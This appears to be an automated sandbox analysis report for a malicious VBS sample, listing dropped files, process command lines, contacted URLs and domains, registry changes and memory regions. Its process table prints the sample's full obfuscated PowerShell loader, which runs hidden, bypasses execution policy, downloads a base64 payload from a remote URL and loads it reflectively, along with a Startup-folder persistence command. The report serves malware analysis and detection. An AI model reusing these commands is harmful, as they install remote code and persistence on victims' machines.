Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
k4STQvJ6rV.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_MSBuild.exe_a7bced54e166153f9488577310c1ceac61948ee5_5655fe73_14928db5-979f-4650-8ae6-2ed8a5965fa2\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB0BF.tmp.dmp
|
Mini DuMP crash report, 15 streams, Mon Oct 7 06:57:54 2024, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB39E.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB3CE.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\XClient.exe.log
|
ASCII text, with CRLF line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\Log.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_12llzcar.ppw.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4h25mcxn.vnu.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_awi0fsbb.wse.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mvjiobm0.d4t.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xvlfewif.0lx.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zdkdakqv.krn.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\XClient.exe
|
PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Oct 7 05:56:27
2024, mtime=Mon Oct 7 05:56:27 2024, atime=Mon Oct 7 05:56:27 2024, length=262432, window=hide
|
dropped
|
||
|
\Device\ConDrv
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 7 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\k4STQvJ6rV.vbs"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\k4STQvJ6rV.vbs',
'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.amoimoil.vbs')')
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping 127.0.0.1 -n 10
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -command [System.IO.File]::Copy('C:\Windows\system32\k4STQvJ6rV.vbs', 'C:\Users\' + [Environment]::UserName +
''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.amoimoil.vbs')')
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdtWHR1cicrJ2wgJysnPSBkMG1odHRwcycrJzonKycvL3Jhdy5naScrJ3RoJysndWJ1c2UnKydyY29uJysndGVuJysndC5jb20nKycvJysnTm9EZXQnKydlY3RPbi9OJysnbycrJ0RlJysndGUnKydjdCcrJ09uLycrJ3JlZicrJ3MvaGVhZHMvbWEnKydpbi9EZXRhJysnaE5vdGgtJysnVi50eHRkMCcrJ207IG1YdGInKydhc2UnKyc2NENvbnRlbnQgPSAoJysnTmV3LU9iamVjdCBTeScrJ3N0ZW0uTicrJ2V0JysnLldlJysnYkNsaWVudCkuJysnRCcrJ293bmwnKydvYWRTdHJpJysnbicrJ2cobVgnKyd0dXInKydsKTsnKycgbVh0YicrJ2luYScrJ3J5QycrJ29udGVuJysndCA9IFtTJysneXN0JysnZW0uQ29uJysndmUnKydydF06OicrJ0YnKydybycrJ20nKydCJysnYXNlNjRTJysndHJpbicrJ2cobVh0YmEnKydzJysnZTYnKyc0Q29uJysndGUnKydudCcrJyk7IG1YdGFzJysnc2UnKydtYicrJ2wnKyd5ID0nKycgW1JlZicrJ2wnKydlY3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzonKydMb2FkJysnKCcrJ21YdGJpbmFyeUNvJysnbnRlbnQpOyBbZG5saWInKycuSScrJ08uJysnSG9tZV06JysnOlZBSSgnKyc3cEswJysnLzQzVnluL2QvZWUuZXRzJysnYScrJ3AvLzpzcHR0aCcrJzdwSycrJywnKycgN3BLZGVzJysnYXQnKydpdmEnKydkbycrJzdwSycrJywnKycgJysnN3AnKydLZGVzYXRpdmFkbycrJzcnKydwSywgN3BLZGVzYXQnKydpdicrJ2FkbzdwSywgJysnN3BLJysnTVNCJysndScrJ2lsZDcnKydwSycrJywgNycrJ3BLN3BLLDdwJysnSzdwSyknKS5SRXBMYWNlKChbY2hhcl0xMDArW2NoYXJdNDgrW2NoYXJdMTA5KSxbc3RyaW5nXVtjaGFyXTM5KS5SRXBMYWNlKCdtWHQnLCckJykuUkVwTGFjZSgoW2NoYXJdNTUrW2NoYXJdMTEyK1tjaGFyXTc1KSxbc3RyaW5nXVtjaGFyXTM0KXwgJiAoICRFTnY6Q09tc3BlY1s0LDE1LDI1XS1Kb2lOJycp';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"('mXtur'+'l '+'= d0mhttps'+':'+'//raw.gi'+'th'+'ubuse'+'rcon'+'ten'+'t.com'+'/'+'NoDet'+'ectOn/N'+'o'+'De'+'te'+'ct'+'On/'+'ref'+'s/heads/ma'+'in/Deta'+'hNoth-'+'V.txtd0'+'m;
mXtb'+'ase'+'64Content = ('+'New-Object Sy'+'stem.N'+'et'+'.We'+'bClient).'+'D'+'ownl'+'oadStri'+'n'+'g(mX'+'tur'+'l);'+'
mXtb'+'ina'+'ryC'+'onten'+'t = [S'+'yst'+'em.Con'+'ve'+'rt]::'+'F'+'ro'+'m'+'B'+'ase64S'+'trin'+'g(mXtba'+'s'+'e6'+'4Con'+'te'+'nt'+');
mXtas'+'se'+'mb'+'l'+'y ='+' [Ref'+'l'+'ection.'+'A'+'ssembly]:'+':'+'Load'+'('+'mXtbinaryCo'+'ntent); [dnlib'+'.I'+'O.'+'Home]:'+':VAI('+'7pK0'+'/43Vyn/d/ee.ets'+'a'+'p//:sptth'+'7pK'+','+'
7pKdes'+'at'+'iva'+'do'+'7pK'+','+' '+'7p'+'Kdesativado'+'7'+'pK, 7pKdesat'+'iv'+'ado7pK, '+'7pK'+'MSB'+'u'+'ild7'+'pK'+',
7'+'pK7pK,7p'+'K7pK)').REpLace(([char]100+[char]48+[char]109),[string][char]39).REpLace('mXt','$').REpLace(([char]55+[char]112+[char]75),[string][char]34)|
& ( $ENv:COmspec[4,15,25]-JoiN'')"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
|
|
|
|
C:\Users\user\AppData\Local\XClient.exe
|
"C:\Users\user\AppData\Local\XClient.exe"
|
|
|
|
C:\Users\user\AppData\Local\XClient.exe
|
"C:\Users\user\AppData\Local\XClient.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 1916
|
There are 4 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://paste.ee/d/nyV34/0
|
188.114.97.3
|
|
|
|
futurist2.ddns.net
|
|
||
|
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
|
185.199.108.133
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://paste.ee
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://www.google.com;
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://raw.githubusercont
|
unknown
|
||
|
https://analytics.paste.ee
|
unknown
|
||
|
https://paste.ee
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://raw.githubusercontent.com
|
unknown
|
||
|
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtd0m;
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://raw.githubusercontent.com
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://analytics.paste.ee;
|
unknown
|
||
|
https://cdnjs.cloudflare.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://cdnjs.cloudflare.com;
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.gravatar.com
|
unknown
|
||
|
https://themes.googleusercontent.com
|
unknown
|
||
|
https://oneget.org
|
unknown
|
There are 22 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
futurist2.ddns.net
|
93.123.39.76
|
|
|
|
paste.ee
|
188.114.97.3
|
|
|
|
raw.githubusercontent.com
|
185.199.108.133
|
||
|
fp2e7a.wpc.phicdn.net
|
192.229.221.95
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.114.97.3
|
paste.ee
|
European Union
|
|
|
|
127.0.0.1
|
unknown
|
unknown
|
|
|
|
93.123.39.76
|
futurist2.ddns.net
|
Bulgaria
|
|
|
|
185.199.108.133
|
raw.githubusercontent.com
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
XClient
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
402000
|
remote allocation
|
page execute and read and write
|
|
|
|
1FFE6961000
|
trusted library allocation
|
page read and write
|
|
|
|
5B02000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AFB0000
|
trusted library allocation
|
page read and write
|
||
|
1FFE5F90000
|
trusted library allocation
|
page read and write
|
||
|
D93000
|
heap
|
page read and write
|
||
|
61E67B7000
|
stack
|
page read and write
|
||
|
1AB7BA20000
|
heap
|
page read and write
|
||
|
1FFE60D4000
|
heap
|
page read and write
|
||
|
1AB7BA65000
|
heap
|
page read and write
|
||
|
2C73000
|
trusted library allocation
|
page read and write
|
||
|
53E0000
|
trusted library allocation
|
page read and write
|
||
|
1AB7BB12000
|
heap
|
page read and write
|
||
|
1AB7BB12000
|
heap
|
page read and write
|
||
|
6D8C000
|
stack
|
page read and write
|
||
|
3F9A000
|
trusted library allocation
|
page read and write
|
||
|
1AB7BCC8000
|
heap
|
page read and write
|
||
|
7FFB49EA2000
|
trusted library allocation
|
page read and write
|
||
|
CA0000
|
heap
|
page read and write
|
||
|
24BFB610000
|
trusted library allocation
|
page read and write
|
||
|
24B805B2000
|
trusted library allocation
|
page read and write
|
||
|
24BFD1D0000
|
heap
|
page execute and read and write
|
||
|
1139000
|
heap
|
page read and write
|
||
|
7FFB4B000000
|
trusted library allocation
|
page read and write
|
||
|
1AB7B99A000
|
heap
|
page read and write
|
||
|
1AB79B3B000
|
heap
|
page read and write
|
||
|
24BFD1B0000
|
heap
|
page read and write
|
||
|
1FFFE6C0000
|
heap
|
page execute and read and write
|
||
|
24132CB5000
|
heap
|
page read and write
|
||
|
1AB7BA21000
|
heap
|
page read and write
|
||
|
2414CC00000
|
heap
|
page read and write
|
||
|
7BB0CFB000
|
stack
|
page read and write
|
||
|
EE5000
|
heap
|
page read and write
|
||
|
13D0000
|
trusted library allocation
|
page read and write
|
||
|
24BFD650000
|
heap
|
page execute and read and write
|
||
|
1330000
|
heap
|
page execute and read and write
|
||
|
1108000
|
heap
|
page read and write
|
||
|
5AF4000
|
trusted library allocation
|
page read and write
|
||
|
1AB7B997000
|
heap
|
page read and write
|
||
|
7FFB4A0F0000
|
trusted library allocation
|
page read and write
|
||
|
7BB08FF000
|
stack
|
page read and write
|
||
|
2414CC72000
|
heap
|
page read and write
|
||
|
3CB1000
|
trusted library allocation
|
page read and write
|
||
|
1AB7B923000
|
heap
|
page read and write
|
||
|
112B000
|
heap
|
page read and write
|
||
|
1109000
|
heap
|
page read and write
|
||
|
57531F9000
|
stack
|
page read and write
|
||
|
24BFB677000
|
heap
|
page read and write
|
||
|
7FFB49EFC000
|
trusted library allocation
|
page execute and read and write
|
||
|
24134BDF000
|
trusted library allocation
|
page read and write
|
||
|
1FFE45F0000
|
heap
|
page read and write
|
||
|
1FFE6809000
|
trusted library allocation
|
page read and write
|
||
|
1FFFE5B0000
|
heap
|
page execute and read and write
|
||
|
7FFB49F56000
|
trusted library allocation
|
page read and write
|
||
|
2414CC1D000
|
heap
|
page read and write
|
||
|
1AB7BCB1000
|
heap
|
page read and write
|
||
|
61E6A3E000
|
stack
|
page read and write
|
||
|
1FFFE68C000
|
heap
|
page read and write
|
||
|
7FFB4A170000
|
trusted library allocation
|
page read and write
|
||
|
1AB7BA58000
|
heap
|
page read and write
|
||
|
24BFB630000
|
trusted library allocation
|
page read and write
|
||
|
1057000
|
trusted library allocation
|
page execute and read and write
|
||
|
5AF6000
|
trusted library allocation
|
page read and write
|
||
|
CA5000
|
heap
|
page read and write
|
||
|
1AB7B952000
|
heap
|
page read and write
|
||
|
1FFFE42D000
|
heap
|
page read and write
|
||
|
24134FE6000
|
trusted library allocation
|
page read and write
|
||
|
1240000
|
heap
|
page read and write
|
||
|
1AB7BA95000
|
heap
|
page read and write
|
||
|
7BB0C76000
|
stack
|
page read and write
|
||
|
2414CE9B000
|
heap
|
page read and write
|
||
|
575307E000
|
stack
|
page read and write
|
||
|
1AB79CA5000
|
heap
|
page read and write
|
||
|
7FFB4ADA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B083000
|
trusted library allocation
|
page read and write
|
||
|
24BFB682000
|
heap
|
page read and write
|
||
|
1FFE6040000
|
heap
|
page read and write
|
||
|
7FFB4ACED000
|
trusted library allocation
|
page execute and read and write
|
||
|
FCD8FD000
|
stack
|
page read and write
|
||
|
7FFB49F86000
|
trusted library allocation
|
page execute and read and write
|
||
|
105B000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AB7B962000
|
heap
|
page read and write
|
||
|
10B0000
|
heap
|
page read and write
|
||
|
2D20000
|
heap
|
page execute and read and write
|
||
|
53E9000
|
trusted library allocation
|
page read and write
|
||
|
24132C8E000
|
heap
|
page read and write
|
||
|
575347E000
|
stack
|
page read and write
|
||
|
5AE9000
|
stack
|
page read and write
|
||
|
2DD0000
|
trusted library allocation
|
page read and write
|
||
|
7BB0F7C000
|
stack
|
page read and write
|
||
|
1AB7B952000
|
heap
|
page read and write
|
||
|
13B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4ADC6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4A150000
|
trusted library allocation
|
page read and write
|
||
|
1AB7BCB1000
|
heap
|
page read and write
|
||
|
1AB7B932000
|
heap
|
page read and write
|
||
|
57533FE000
|
stack
|
page read and write
|
||
|
24B804A4000
|
trusted library allocation
|
page read and write
|
||
|
1FFFEBF0000
|
trusted library section
|
page read and write
|
||
|
7BB0BF9000
|
stack
|
page read and write
|
||
|
61E69BE000
|
stack
|
page read and write
|
||
|
54C3000
|
heap
|
page read and write
|
||
|
24B8009C000
|
trusted library allocation
|
page read and write
|
||
|
24B80122000
|
trusted library allocation
|
page read and write
|
||
|
12E0000
|
trusted library allocation
|
page read and write
|
||
|
1FFFE5C0000
|
heap
|
page read and write
|
||
|
13F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A190000
|
trusted library allocation
|
page read and write
|
||
|
D78000
|
heap
|
page read and write
|
||
|
CF0000
|
heap
|
page read and write
|
||
|
7FFB4AF20000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AEF0000
|
trusted library allocation
|
page read and write
|
||
|
61E667E000
|
stack
|
page read and write
|
||
|
55D0000
|
trusted library allocation
|
page read and write
|
||
|
24BFD657000
|
heap
|
page execute and read and write
|
||
|
61E647E000
|
stack
|
page read and write
|
||
|
7FFB4AF10000
|
trusted library allocation
|
page read and write
|
||
|
24B80114000
|
trusted library allocation
|
page read and write
|
||
|
2B30000
|
heap
|
page read and write
|
||
|
61E61CE000
|
stack
|
page read and write
|
||
|
123E000
|
stack
|
page read and write
|
||
|
1FFE684E000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF30000
|
trusted library allocation
|
page read and write
|
||
|
416000
|
remote allocation
|
page execute and read and write
|
||
|
1AB79A30000
|
heap
|
page read and write
|
||
|
1AB79A20000
|
heap
|
page read and write
|
||
|
13B6000
|
trusted library allocation
|
page read and write
|
||
|
2CDE000
|
stack
|
page read and write
|
||
|
1AB7B982000
|
heap
|
page read and write
|
||
|
7BB097E000
|
stack
|
page read and write
|
||
|
143E000
|
stack
|
page read and write
|
||
|
1FFE7DF3000
|
trusted library allocation
|
page read and write
|
||
|
24BFD205000
|
heap
|
page read and write
|
||
|
7BB087D000
|
stack
|
page read and write
|
||
|
24134620000
|
heap
|
page read and write
|
||
|
1FFE469D000
|
heap
|
page read and write
|
||
|
1FFE60D0000
|
heap
|
page read and write
|
||
|
EC0000
|
heap
|
page read and write
|
||
|
2414CD00000
|
heap
|
page execute and read and write
|
||
|
1FFFE667000
|
heap
|
page read and write
|
||
|
1AB7BA97000
|
heap
|
page read and write
|
||
|
1FFFE713000
|
heap
|
page read and write
|
||
|
24134BF4000
|
trusted library allocation
|
page read and write
|
||
|
1115000
|
heap
|
page read and write
|
||
|
7FFB4A054000
|
trusted library allocation
|
page read and write
|
||
|
61E6838000
|
stack
|
page read and write
|
||
|
7FFB4B020000
|
trusted library allocation
|
page read and write
|
||
|
2EF1000
|
trusted library allocation
|
page read and write
|
||
|
1AB7BA88000
|
heap
|
page read and write
|
||
|
7FFB4A1E0000
|
trusted library allocation
|
page read and write
|
||
|
1AB79B54000
|
heap
|
page read and write
|
||
|
1AB7B92C000
|
heap
|
page read and write
|
||
|
7FFB4AE91000
|
trusted library allocation
|
page read and write
|
||
|
1AB7B947000
|
heap
|
page read and write
|
||
|
109D000
|
trusted library allocation
|
page execute and read and write
|
||
|
575357C000
|
stack
|
page read and write
|
||
|
8EC000
|
stack
|
page read and write
|
||
|
5B1D000
|
trusted library allocation
|
page read and write
|
||
|
1AB7BD20000
|
heap
|
page read and write
|
||
|
6D4D000
|
stack
|
page read and write
|
||
|
5752B83000
|
stack
|
page read and write
|
||
|
24BFB570000
|
heap
|
page read and write
|
||
|
7FFB4AE91000
|
trusted library allocation
|
page read and write
|
||
|
1FFFE881000
|
heap
|
page read and write
|
||
|
5B22000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AFE0000
|
trusted library allocation
|
page read and write
|
||
|
24BFD618000
|
heap
|
page read and write
|
||
|
1AB79B51000
|
heap
|
page read and write
|
||
|
7FFB4A1D0000
|
trusted library allocation
|
page read and write
|
||
|
2414CD76000
|
heap
|
page execute and read and write
|
||
|
1AB7BD01000
|
heap
|
page read and write
|
||
|
1AB7BD01000
|
heap
|
page read and write
|
||
|
1FFFE710000
|
heap
|
page read and write
|
||
|
24BFD690000
|
heap
|
page read and write
|
||
|
7FFB4B040000
|
trusted library allocation
|
page read and write
|
||
|
2DB0000
|
heap
|
page execute and read and write
|
||
|
2414CD80000
|
heap
|
page read and write
|
||
|
24134C90000
|
trusted library allocation
|
page read and write
|
||
|
2ADE000
|
stack
|
page read and write
|
||
|
1AB7BC06000
|
heap
|
page read and write
|
||
|
7FFB4AE9A000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B090000
|
trusted library allocation
|
page read and write
|
||
|
7BB0DFE000
|
stack
|
page read and write
|
||
|
24BFD595000
|
heap
|
page read and write
|
||
|
1AB7BCC0000
|
heap
|
page read and write
|
||
|
2414CC15000
|
heap
|
page read and write
|
||
|
7BB05CE000
|
stack
|
page read and write
|
||
|
24BFB885000
|
heap
|
page read and write
|
||
|
1AB7BD01000
|
heap
|
page read and write
|
||
|
FCD3FE000
|
stack
|
page read and write
|
||
|
7FFB4A082000
|
trusted library allocation
|
page read and write
|
||
|
57534FE000
|
stack
|
page read and write
|
||
|
7FFB4AD9C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FFE6643000
|
trusted library allocation
|
page read and write
|
||
|
24B8054C000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A1B0000
|
trusted library allocation
|
page read and write
|
||
|
5752BCE000
|
stack
|
page read and write
|
||
|
24B90001000
|
trusted library allocation
|
page read and write
|
||
|
609E000
|
stack
|
page read and write
|
||
|
1390000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF00000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A05A000
|
trusted library allocation
|
page read and write
|
||
|
13A0000
|
trusted library allocation
|
page read and write
|
||
|
5C40000
|
trusted library allocation
|
page read and write
|
||
|
1AB7B972000
|
heap
|
page read and write
|
||
|
1FFE60D6000
|
heap
|
page read and write
|
||
|
7FFB4AF50000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B000000
|
trusted library allocation
|
page read and write
|
||
|
13C6000
|
trusted library allocation
|
page execute and read and write
|
||
|
24132BE0000
|
heap
|
page read and write
|
||
|
5DFC000
|
stack
|
page read and write
|
||
|
1100000
|
heap
|
page read and write
|
||
|
7FFB4AE80000
|
trusted library allocation
|
page read and write
|
||
|
1FFE5F80000
|
heap
|
page execute and read and write
|
||
|
C50000
|
heap
|
page read and write
|
||
|
24132B70000
|
heap
|
page read and write
|
||
|
10A0000
|
trusted library allocation
|
page read and write
|
||
|
24144B62000
|
trusted library allocation
|
page read and write
|
||
|
2B08000
|
trusted library allocation
|
page read and write
|
||
|
575317E000
|
stack
|
page read and write
|
||
|
1FFF6A3B000
|
trusted library allocation
|
page read and write
|
||
|
7BB0EFE000
|
stack
|
page read and write
|
||
|
2414CD70000
|
heap
|
page execute and read and write
|
||
|
1FFF6492000
|
trusted library allocation
|
page read and write
|
||
|
1FFF671B000
|
trusted library allocation
|
page read and write
|
||
|
24132C25000
|
heap
|
page read and write
|
||
|
1080000
|
trusted library allocation
|
page read and write
|
||
|
24134BFA000
|
trusted library allocation
|
page read and write
|
||
|
6B20000
|
heap
|
page read and write
|
||
|
1AB7BCC9000
|
heap
|
page read and write
|
||
|
2CA0000
|
heap
|
page read and write
|
||
|
1010000
|
heap
|
page read and write
|
||
|
1FFE7B63000
|
trusted library allocation
|
page read and write
|
||
|
24BFB6F9000
|
heap
|
page read and write
|
||
|
1AB7B941000
|
heap
|
page read and write
|
||
|
3EF1000
|
trusted library allocation
|
page read and write
|
||
|
24132CB7000
|
heap
|
page read and write
|
||
|
7FFB4AF90000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A0A0000
|
trusted library allocation
|
page read and write
|
||
|
55E0000
|
heap
|
page execute and read and write
|
||
|
FCD4FF000
|
stack
|
page read and write
|
||
|
1FFFE7F0000
|
heap
|
page read and write
|
||
|
CEE000
|
stack
|
page read and write
|
||
|
103F000
|
stack
|
page read and write
|
||
|
10A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A0B0000
|
trusted library allocation
|
page read and write
|
||
|
24B8010E000
|
trusted library allocation
|
page read and write
|
||
|
1FFE46AB000
|
heap
|
page read and write
|
||
|
7FFB4AD90000
|
trusted library allocation
|
page read and write
|
||
|
7BB0D78000
|
stack
|
page read and write
|
||
|
13BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AB7BDD9000
|
heap
|
page read and write
|
||
|
53DE000
|
stack
|
page read and write
|
||
|
D30000
|
trusted library allocation
|
page read and write
|
||
|
24B8015E000
|
trusted library allocation
|
page read and write
|
||
|
61E65FF000
|
stack
|
page read and write
|
||
|
1AB7BC20000
|
heap
|
page read and write
|
||
|
7FFB4ACF0000
|
trusted library allocation
|
page read and write
|
||
|
1AB7B96B000
|
heap
|
page read and write
|
||
|
61E66F9000
|
stack
|
page read and write
|
||
|
1AB79B61000
|
heap
|
page read and write
|
||
|
24B90072000
|
trusted library allocation
|
page read and write
|
||
|
1AB79CA0000
|
heap
|
page read and write
|
||
|
2D31000
|
trusted library allocation
|
page read and write
|
||
|
24134AF1000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AE00000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4AEB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
24135022000
|
trusted library allocation
|
page read and write
|
||
|
576E000
|
stack
|
page read and write
|
||
|
1AB7BA7D000
|
heap
|
page read and write
|
||
|
24BFD710000
|
heap
|
page execute and read and write
|
||
|
7FFB4B07C000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4ACED000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AB7BA68000
|
heap
|
page read and write
|
||
|
24BFB640000
|
heap
|
page readonly
|
||
|
7FFB4A110000
|
trusted library allocation
|
page read and write
|
||
|
C3C000
|
stack
|
page read and write
|
||
|
24BFD720000
|
heap
|
page read and write
|
||
|
1AB7BA29000
|
heap
|
page read and write
|
||
|
1FFFE85C000
|
heap
|
page read and write
|
||
|
1FFE5FC2000
|
trusted library allocation
|
page read and write
|
||
|
575337C000
|
stack
|
page read and write
|
||
|
2414D1D0000
|
heap
|
page read and write
|
||
|
1AB7B92B000
|
heap
|
page read and write
|
||
|
5752FFD000
|
stack
|
page read and write
|
||
|
D38000
|
stack
|
page read and write
|
||
|
7BB0AFE000
|
stack
|
page read and write
|
||
|
68CE000
|
stack
|
page read and write
|
||
|
1AB7BC06000
|
heap
|
page read and write
|
||
|
1AB7B921000
|
heap
|
page read and write
|
||
|
605B000
|
stack
|
page read and write
|
||
|
1AB7BC9A000
|
heap
|
